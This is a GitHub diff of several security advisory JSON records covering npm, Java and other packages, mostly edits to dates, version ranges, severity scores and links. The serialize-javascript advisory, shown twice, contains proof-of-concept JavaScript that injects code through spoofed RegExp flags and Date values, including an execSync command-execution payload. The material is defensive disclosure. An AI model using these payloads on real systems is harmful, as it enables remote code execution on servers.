github
diff --git a/‎advisories/github-reviewed/2017/10/GHSA-x6fg-f45m-jf5q/GHSA-x6fg-f45m-jf5q.json‎
Lines changed: 19 additions & 3 deletions b/‎advisories/github-reviewed/2017/10/GHSA-x6fg-f45m-jf5q/GHSA-x6fg-f45m-jf5q.json‎
Lines changed: 19 additions & 3 deletions
diff --git a/‎advisories/github-reviewed/2024/02/GHSA-8hp3-rmr7-xh88/GHSA-8hp3-rmr7-xh88.json‎
Lines changed: 1 addition & 1 deletion b/‎advisories/github-reviewed/2024/02/GHSA-8hp3-rmr7-xh88/GHSA-8hp3-rmr7-xh88.json‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎advisories/github-reviewed/2025/03/GHSA-f82v-jwr5-mffw/GHSA-f82v-jwr5-mffw.json‎
Lines changed: 2 additions & 2 deletions b/‎advisories/github-reviewed/2025/03/GHSA-f82v-jwr5-mffw/GHSA-f82v-jwr5-mffw.json‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎advisories/github-reviewed/2025/12/GHSA-6rw7-vpxm-498p/GHSA-6rw7-vpxm-498p.json‎
Lines changed: 4 additions & 4 deletions b/‎advisories/github-reviewed/2025/12/GHSA-6rw7-vpxm-498p/GHSA-6rw7-vpxm-498p.json‎
Lines changed: 4 additions & 4 deletions
diff --git a/‎advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json‎
Lines changed: 9 additions & 1 deletion b/‎advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json‎
Lines changed: 9 additions & 1 deletion
diff --git a/‎advisories/github-reviewed/2026/02/GHSA-4rv8-5cmm-2r22/GHSA-4rv8-5cmm-2r22.json‎
Lines changed: 5 additions & 1 deletion b/‎advisories/github-reviewed/2026/02/GHSA-4rv8-5cmm-2r22/GHSA-4rv8-5cmm-2r22.json‎
Lines changed: 5 additions & 1 deletion
diff --git a/‎advisories/github-reviewed/2026/02/GHSA-5c6j-r48x-rmvq/GHSA-5c6j-r48x-rmvq.json‎
Lines changed: 2 additions & 2 deletions b/‎advisories/github-reviewed/2026/02/GHSA-5c6j-r48x-rmvq/GHSA-5c6j-r48x-rmvq.json‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎advisories/github-reviewed/2026/02/GHSA-72hv-8253-57qq/GHSA-72hv-8253-57qq.json‎
Lines changed: 3 additions & 3 deletions b/‎advisories/github-reviewed/2026/02/GHSA-72hv-8253-57qq/GHSA-72hv-8253-57qq.json‎
Lines changed: 3 additions & 3 deletions
diff --git a/‎advisories/github-reviewed/2026/02/GHSA-7q64-3rg2-h9pf/GHSA-7q64-3rg2-h9pf.json‎
Lines changed: 64 additions & 0 deletions b/‎advisories/github-reviewed/2026/02/GHSA-7q64-3rg2-h9pf/GHSA-7q64-3rg2-h9pf.json‎
Lines changed: 64 additions & 0 deletions
diff --git a/‎advisories/github-reviewed/2026/02/GHSA-82g8-464f-2mv7/GHSA-82g8-464f-2mv7.json‎
Lines changed: 2 additions & 2 deletions b/‎advisories/github-reviewed/2026/02/GHSA-82g8-464f-2mv7/GHSA-82g8-464f-2mv7.json‎
Lines changed: 2 additions & 2 deletions
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-x6fg-f45m-jf5q",
-  "modified": "2021-09-21T22:15:35Z",
+  "modified": "2026-03-03T20:03:27Z",
   "published": "2017-10-24T18:33:36Z",
   "aliases": [
     "CVE-2015-8855"
@@ -25,7 +25,7 @@
           "type": "ECOSYSTEM",
           "events": [
             {
-              "introduced": "0"
+              "introduced": "1.0.4"
             },
             {
               "fixed": "4.3.2"
@@ -40,10 +40,26 @@
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8855"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/github/advisory-database/pull/7102"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/npm/node-semver/commit/5c4c9f6e26c7052a42b5ced2a7481c5c9b4363a0"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/npm/node-semver/commit/c80180d8341a8ada0236815c29a2be59864afd70"
+    },
     {
       "type": "ADVISORY",
       "url": "https://github.com/advisories/GHSA-x6fg-f45m-jf5q"
     },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/npm/node-semver"
+    },
     {
       "type": "WEB",
       "url": "https://www.npmjs.com/advisories/31"
@@ -68,6 +84,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2020-06-16T22:02:25Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2017-01-23T21:59:00Z"
   }
 }
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-8hp3-rmr7-xh88",
-  "modified": "2024-02-20T23:47:36Z",
+  "modified": "2026-03-04T01:57:19Z",
   "published": "2024-02-17T06:30:35Z",
   "aliases": [
     "CVE-2024-21497"
 
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-f82v-jwr5-mffw",
-  "modified": "2025-10-13T15:32:07Z",
+  "modified": "2026-03-02T16:59:03Z",
   "published": "2025-03-21T15:20:12Z",
   "aliases": [
     "CVE-2025-29927"
@@ -82,7 +82,7 @@
           "type": "ECOSYSTEM",
           "events": [
             {
-              "introduced": "11.1.4"
+              "introduced": "12.0.0"
             },
             {
               "fixed": "12.3.5"
 
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-6rw7-vpxm-498p",
-  "modified": "2026-02-10T19:59:52Z",
+  "modified": "2026-03-02T22:05:33Z",
   "published": "2025-12-30T21:02:54Z",
   "aliases": [
     "CVE-2025-15284"
@@ -11,11 +11,11 @@
   "severity": [
     {
       "type": "CVSS_V3",
-      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
     },
     {
       "type": "CVSS_V4",
-      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L"
     }
   ],
   "affected": [
@@ -61,7 +61,7 @@
     "cwe_ids": [
       "CWE-20"
     ],
-    "severity": "HIGH",
+    "severity": "MODERATE",
     "github_reviewed": true,
     "github_reviewed_at": "2025-12-30T21:02:54Z",
     "nvd_published_at": "2025-12-29T23:15:42Z"
 
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-2g4f-4pwh-qvx6",
-  "modified": "2026-02-23T22:40:29Z",
+  "modified": "2026-03-02T21:58:39Z",
   "published": "2026-02-11T21:30:39Z",
   "aliases": [
     "CVE-2025-69873"
@@ -67,6 +67,14 @@
       "type": "WEB",
       "url": "https://github.com/ajv-validator/ajv/pull/2588"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/ajv-validator/ajv/pull/2590"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/github/advisory-database/pull/6991"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5"
 
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-4rv8-5cmm-2r22",
-  "modified": "2026-02-28T02:07:15Z",
+  "modified": "2026-03-02T15:22:41Z",
   "published": "2026-02-28T02:07:15Z",
   "aliases": [
     "CVE-2026-28280"
@@ -48,6 +48,10 @@
       "type": "WEB",
       "url": "https://github.com/jmpsec/osctrl/pull/778"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/jmpsec/osctrl/pull/780"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/jmpsec/osctrl"
 
@@ -1,11 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-5c6j-r48x-rmvq",
-  "modified": "2026-02-28T02:50:45Z",
+  "modified": "2026-03-02T16:17:35Z",
   "published": "2026-02-28T02:50:45Z",
   "aliases": [],
   "summary": "Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()",
-  "details": "### Impact\n\nThe serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes.\n\n```\njavascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () => 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n  get: () => '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" — injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```\njavascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" — injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```\njavascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () => 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n  get: () => '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
+  "details": "### Impact\n\nThe serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes.\n\n```javascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () => 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n  get: () => '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" — injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" — injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () => 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n  get: () => '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
   "severity": [
     {
       "type": "CVSS_V3",
 
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-72hv-8253-57qq",
-  "modified": "2026-02-28T02:01:06Z",
+  "modified": "2026-03-03T16:59:14Z",
   "published": "2026-02-28T02:01:05Z",
   "aliases": [],
   "summary": "jackson-core: Number Length Constraint Bypass in Async Parser Leads to Potential DoS Condition",
@@ -141,11 +141,11 @@
     },
     {
       "type": "WEB",
-      "url": "https://github.com/FasterXML/jackson-core/issues/1538"
+      "url": "https://github.com/FasterXML/jackson-core/pull/1555"
     },
     {
       "type": "WEB",
-      "url": "https://github.com/FasterXML/jackson-core/commit/a004e9789c2cc6b41b379d02d229d58474d9a738"
+      "url": "https://github.com/FasterXML/jackson-core/commit/b0c428e6f993e1b5ece5c1c3cb2523e887cd52cf"
     },
     {
       "type": "PACKAGE",
 
@@ -0,0 +1,64 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7q64-3rg2-h9pf",
+  "modified": "2026-03-02T14:34:03Z",
+  "published": "2026-02-27T18:31:06Z",
+  "withdrawn": "2026-03-02T14:34:03Z",
+  "aliases": [],
+  "summary": "Duplicate Advisory: Nest has a Fastify URL Encoding Middleware Bypass",
+  "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-r4wm-x892-vjmx. This link is maintained to preserve external references.\n\n## Original Description\n\nA NestJS application using @nestjs/platform-fastify can allow bypass of authentication/authorization middleware when Fastify path-normalization options are enabled.\n\n\n\nThis issue affects nest.Js: 11.1.13.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@nestjs/platform-fastify"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "11.1.14"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2293"
+    },
+    {
+      "type": "WEB",
+      "url": "https://fluidattacks.com/advisories/neton"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/nestjs/nest"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/nestjs/nest/releases/tag/v11.1.14"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-863"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-02T14:34:03Z",
+    "nvd_published_at": "2026-02-27T17:16:33Z"
+  }
+}
@@ -1,11 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-82g8-464f-2mv7",
-  "modified": "2026-02-27T21:36:17Z",
+  "modified": "2026-03-02T17:17:43Z",
   "published": "2026-02-27T21:36:17Z",
   "aliases": [],
   "summary": "OpenClaw: Skill env override host env injection via applySkillConfigEnvOverrides (defense-in-depth)",
-  "details": "### Summary\n`applySkillConfigEnvOverrides` previously copied `skills.entries.*.env` values into the host `process.env` without applying the host env safety policy.\n\n### Impact\nIn affected versions, dangerous process-level variables such as `NODE_OPTIONS` could be injected when unset, which can influence runtime/child-process behavior.\n\n### Required attacker capability\nAn attacker must be able to modify OpenClaw local state/config (for example `~/.openclaw/openclaw.json`) to set `skills.entries.<skill>.env` or related skill config values.\n\n### Severity rationale\nPer `SECURITY.md`, anyone who can modify `~/.openclaw` config is already a trusted operator, and mutually untrusted operators sharing one host/config are out of scope. Because exploitation requires trusted-config write access in the documented model, this is classified as a **medium** defense-in-depth issue rather than a cross-boundary critical break.\n\n### Remediation\nFixed in `2026.2.21` by sanitizing skill env overrides and blocking dangerous host env keys (including `NODE_OPTIONS`) before applying overrides, with regression tests covering blocked dangerous keys.\n\n## Fix Commit(s)\n- `8c9f35cdb51692b650ddf05b259ccdd75cc9a83c`\n\nFound using [MCPwner](https://github.com/Pigyon/MCPwner)",
+  "details": "### Summary\n`applySkillConfigEnvOverrides` previously copied `skills.entries.*.env` values into the host `process.env` without applying the host env safety policy.\n\n### Impact\nIn affected versions, dangerous process-level variables such as `NODE_OPTIONS` could be injected when unset, which can influence runtime/child-process behavior.\n\n### Required attacker capability\nAn attacker must be able to modify OpenClaw local state/config (for example `~/.openclaw/openclaw.json`) to set `skills.entries.<skill>.env` or related skill config values.\n\n### Remediation\nFixed in `2026.2.21` by sanitizing skill env overrides and blocking dangerous host env keys (including `NODE_OPTIONS`) before applying overrides, with regression tests covering blocked dangerous keys.\n\n## Fix Commit(s)\n- `8c9f35cdb51692b650ddf05b259ccdd75cc9a83c`\n\nFound using [MCPwner](https://github.com/Pigyon/MCPwner)",
   "severity": [
     {
       "type": "CVSS_V4",
Original file line number	Diff line number	Diff line change
`@@ -1,7 +1,7 @@`
`1`	`1`	`{`
`2`	`2`	`"schema_version": "1.4.0",`
`3`	`3`	`"id": "GHSA-8hp3-rmr7-xh88",`
`4`		`- "modified": "2024-02-20T23:47:36Z",`
	`4`	`+ "modified": "2026-03-04T01:57:19Z",`
`5`	`5`	`"published": "2024-02-17T06:30:35Z",`
`6`	`6`	`"aliases": [`
`7`	`7`	`"CVE-2024-21497"`
Original file line number	Diff line number	Diff line change
`@@ -1,7 +1,7 @@`
`1`	`1`	`{`
`2`	`2`	`"schema_version": "1.4.0",`
`3`	`3`	`"id": "GHSA-f82v-jwr5-mffw",`
`4`		`- "modified": "2025-10-13T15:32:07Z",`
	`4`	`+ "modified": "2026-03-02T16:59:03Z",`
`5`	`5`	`"published": "2025-03-21T15:20:12Z",`
`6`	`6`	`"aliases": [`
`7`	`7`	`"CVE-2025-29927"`
`@@ -82,7 +82,7 @@`
`82`	`82`	`"type": "ECOSYSTEM",`
`83`	`83`	`"events": [`
`84`	`84`	`{`
`85`		`- "introduced": "11.1.4"`
	`85`	`+ "introduced": "12.0.0"`
`86`	`86`	`},`
`87`	`87`	`{`
`88`	`88`	`"fixed": "12.3.5"`
Original file line number	Diff line number	Diff line change
`@@ -1,11 +1,11 @@`
`1`	`1`	`{`
`2`	`2`	`"schema_version": "1.4.0",`
`3`	`3`	`"id": "GHSA-5c6j-r48x-rmvq",`
`4`		`- "modified": "2026-02-28T02:50:45Z",`
	`4`	`+ "modified": "2026-03-02T16:17:35Z",`
`5`	`5`	`"published": "2026-02-28T02:50:45Z",`
`6`	`6`	`"aliases": [],`
`7`	`7`	`"summary": "Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()",`
`8`		- "details": "### Impact\n\nThe serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes.\n\n```\njavascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () => 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n get: () => '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" — injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```\njavascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" — injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```\njavascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () => 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n get: () => '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
	`8`	+ "details": "### Impact\n\nThe serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes.\n\n```javascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () => 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n get: () => '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" — injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" — injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () => 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n get: () => '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
`9`	`9`	`"severity": [`
`10`	`10`	`{`
`11`	`11`	`"type": "CVSS_V3",`
Original file line number	Diff line number	Diff line change
`@@ -1,7 +1,7 @@`
`1`	`1`	`{`
`2`	`2`	`"schema_version": "1.4.0",`
`3`	`3`	`"id": "GHSA-72hv-8253-57qq",`
`4`		`- "modified": "2026-02-28T02:01:06Z",`
	`4`	`+ "modified": "2026-03-03T16:59:14Z",`
`5`	`5`	`"published": "2026-02-28T02:01:05Z",`
`6`	`6`	`"aliases": [],`
`7`	`7`	`"summary": "jackson-core: Number Length Constraint Bypass in Async Parser Leads to Potential DoS Condition",`
`@@ -141,11 +141,11 @@`
`141`	`141`	`},`
`142`	`142`	`{`
`143`	`143`	`"type": "WEB",`
`144`		`- "url": "https://github.com/FasterXML/jackson-core/issues/1538"`
	`144`	`+ "url": "https://github.com/FasterXML/jackson-core/pull/1555"`
`145`	`145`	`},`
`146`	`146`	`{`
`147`	`147`	`"type": "WEB",`
`148`		`- "url": "https://github.com/FasterXML/jackson-core/commit/a004e9789c2cc6b41b379d02d229d58474d9a738"`
	`148`	`+ "url": "https://github.com/FasterXML/jackson-core/commit/b0c428e6f993e1b5ece5c1c3cb2523e887cd52cf"`
`149`	`149`	`},`
`150`	`150`	`{`
`151`	`151`	`"type": "PACKAGE",`
Original file line number	Diff line number	Diff line change
`@@ -1,11 +1,11 @@`
`1`	`1`	`{`
`2`	`2`	`"schema_version": "1.4.0",`
`3`	`3`	`"id": "GHSA-82g8-464f-2mv7",`
`4`		`- "modified": "2026-02-27T21:36:17Z",`
	`4`	`+ "modified": "2026-03-02T17:17:43Z",`
`5`	`5`	`"published": "2026-02-27T21:36:17Z",`
`6`	`6`	`"aliases": [],`
`7`	`7`	`"summary": "OpenClaw: Skill env override host env injection via applySkillConfigEnvOverrides (defense-in-depth)",`
`8`		- "details": "### Summary\n`applySkillConfigEnvOverrides` previously copied `skills.entries..env` values into the host `process.env` without applying the host env safety policy.\n\n### Impact\nIn affected versions, dangerous process-level variables such as `NODE_OPTIONS` could be injected when unset, which can influence runtime/child-process behavior.\n\n### Required attacker capability\nAn attacker must be able to modify OpenClaw local state/config (for example `~/.openclaw/openclaw.json`) to set `skills.entries.<skill>.env` or related skill config values.\n\n### Severity rationale\nPer `SECURITY.md`, anyone who can modify `~/.openclaw` config is already a trusted operator, and mutually untrusted operators sharing one host/config are out of scope. Because exploitation requires trusted-config write access in the documented model, this is classified as a medium* defense-in-depth issue rather than a cross-boundary critical break.\n\n### Remediation\nFixed in `2026.2.21` by sanitizing skill env overrides and blocking dangerous host env keys (including `NODE_OPTIONS`) before applying overrides, with regression tests covering blocked dangerous keys.\n\n## Fix Commit(s)\n- `8c9f35cdb51692b650ddf05b259ccdd75cc9a83c`\n\nFound using [MCPwner](https://github.com/Pigyon/MCPwner)",
	`8`	+ "details": "### Summary\n`applySkillConfigEnvOverrides` previously copied `skills.entries.*.env` values into the host `process.env` without applying the host env safety policy.\n\n### Impact\nIn affected versions, dangerous process-level variables such as `NODE_OPTIONS` could be injected when unset, which can influence runtime/child-process behavior.\n\n### Required attacker capability\nAn attacker must be able to modify OpenClaw local state/config (for example `~/.openclaw/openclaw.json`) to set `skills.entries.<skill>.env` or related skill config values.\n\n### Remediation\nFixed in `2026.2.21` by sanitizing skill env overrides and blocking dangerous host env keys (including `NODE_OPTIONS`) before applying overrides, with regression tests covering blocked dangerous keys.\n\n## Fix Commit(s)\n- `8c9f35cdb51692b650ddf05b259ccdd75cc9a83c`\n\nFound using [MCPwner](https://github.com/Pigyon/MCPwner)",
`9`	`9`	`"severity": [`
`10`	`10`	`{`
`11`	`11`	`"type": "CVSS_V4",`